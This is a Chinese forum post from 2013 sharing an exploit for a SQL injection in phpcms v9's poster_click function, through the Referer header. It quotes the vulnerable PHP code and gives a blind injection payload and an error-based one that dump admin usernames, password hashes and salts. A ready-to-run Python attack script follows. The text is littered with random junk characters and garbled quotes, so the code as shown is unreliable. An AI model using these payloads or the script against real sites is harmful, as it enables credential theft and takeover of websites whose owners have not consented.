有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
8 d2 H. D+ x% P% z L2 G! c
! X# ]& h. h$ ]6 N( g0 ^7 Y$ g( M问题函数\phpcms\modules\poster\index.php
# o& m4 z4 U; [2 _0 d L& M8 B) s$ o4 m4 F) w* l2 |0 r! t6 g
public function poster_click() {6 f l5 q" d& B4 s7 a
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;: V3 P. b6 \+ Q. J1 q" b
$r = $this->db->get_one(array('id'=>$id));
7 u! @& I0 B0 @0 ]5 ]if (!is_array($r) && empty($r)) return false;
! h" U+ c/ d7 Z3 k$ip_area = pc_base::load_sys_class('ip_area');
( z/ Y5 z- y5 a2 k: Q3 P8 j1 i$ip = ip();4 [. `% U3 v9 Y0 J7 K2 r
$area = $ip_area->get($ip);! q' c- j: Y8 |# D
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
# q3 y/ z. O) Q( R% y& a" D. [if($id) {
2 Z8 ^4 |4 t% b) I' R) q9 M$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
( W6 J9 i! h Z% Z2 I: s% `$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));1 W9 z6 L' U" c& d5 @! J8 R
}
& [6 f& M3 H9 a. a: c$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));: S7 a5 ~* N" K b$ `
$setting = string2array($r['setting']);6 I4 Y- _3 X6 K' m4 I! t7 }( W
if (count($setting)==1) {
8 }$ y5 w( w, v5 e% Y: {$url = $setting['1']['linkurl'];
- O; x" P5 I. `% w} else {
: s, u* _8 y" l: q0 K' `$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];( a8 ^$ t# B( ^) @+ h
}! Z( c, p5 P5 Q0 y: q, j1 e
header('Location: '.$url);- h% p; M6 N: x! m
}& `: T: {2 [, F4 Q
/ l: R5 D9 H( S ~2 \& V; l / P: B' H( f6 y6 ^% B' a( E2 R
+ k9 N4 n8 l8 Z$ F6 x3 P利用方式:
( {4 B: v1 ^) _% N4 Q0 g
( z+ j1 T) v# @& F0 f1、可以采用盲注入的手法:/ }- H( C' n3 H, L* L0 `
* c- r9 y: t [. Ireferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
/ ]3 i+ x+ G9 y/ j0 v2 m+ ]' x7 n
6 {0 n" _9 C$ u# X* C通过返回页面,正常与否一个个猜解密码字段。
3 b9 N W7 }6 \$ X" S
9 j! Q) L9 O! H- x% h9 i8 S2、代码是花开写的,随手附上了:5 @8 C N) _& g# S2 Q' `, y$ [- z
1 n8 E9 |2 d, a6 g1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
" I% u3 k; J% ]& p8 k
% g, o% |& h) Y3 U; y此方法是爆错注入手法,原理自查。
1 I/ R8 W& s3 [
5 z( U' U a/ @6 `! c/ [- o ; Q, D* l& t' ]+ C J
& W) y6 D% E9 E: b7 O
利用程序:
, i8 J; g* Q* Y1 Z8 S P+ |: F; m( N: H
#!/usr/bin/env python/ `: x% w, K( P8 i
import httplib,sys,re
0 ~/ ^* s N7 s: m1 `2 s
/ Z: A" r% n( Y" |0 Gdef attack():
; Q2 F" J3 S, _8 g# w& k9 Zprint “Code by Pax.Mac Team conqu3r!”! q9 {2 A2 D8 W8 i
print “Welcome to our zone!!!”6 }, W3 q5 J5 ]+ P& K. g
url=sys.argv[1]
1 b4 Q% D/ i+ e- Q0 R$ Tpaths=sys.argv[2]
' G; R U9 K& F' P. O2 aconn = httplib.HTTPConnection(url)' `1 Y; I' J$ W8 N+ d$ i: U7 P
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
1 T; Y3 `. z1 M% ^& E5 {$ a3 P“Accept”: “text/plain”,. b/ E. e; h4 D; h' L# n
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}5 n, M( w6 ]. B5 u7 A2 F
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)+ z0 _6 W8 [, Y- `, ^
r1 = conn.getresponse(): o1 p9 X- D8 {/ C6 j
datas=r1.read()
% X w% Q2 S6 T9 H6 K/ Adatas=re.findall(r”Duplicate entry \’\w+’”, datas)
' l% `! f/ Z% V/ \/ v. Nprint datas[0]
M1 r1 _/ _6 j6 f' ?conn.close()% C& B$ s% s# c
if __name__==”__main__”:' ~. B2 O) b& K, [: n
if len(sys.argv)<3:
+ e3 n. \) h" Nprint “Code by Pax.Mac Team conqu3r”$ q! W9 h% ]$ j3 T7 U6 X/ c' G
print “Usgae:”& |, b; w1 K8 j# G7 X3 a0 C
print “ phpcmsattack.py www.paxmac.org /”5 S+ e- S' Z9 y' [! ]; A' Q- _& o
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
8 L- Y, I, r( [: T, u9 i, asys.exit(1)
' K3 |* i$ Y) I9 D7 L" m1 ^attack()" B7 r& |0 I' t8 y. R4 [- `
- a+ ^9 X9 d2 S% k# O7 h |
发表于 2013-1-11 21:01:00
收藏
分享
支持
反对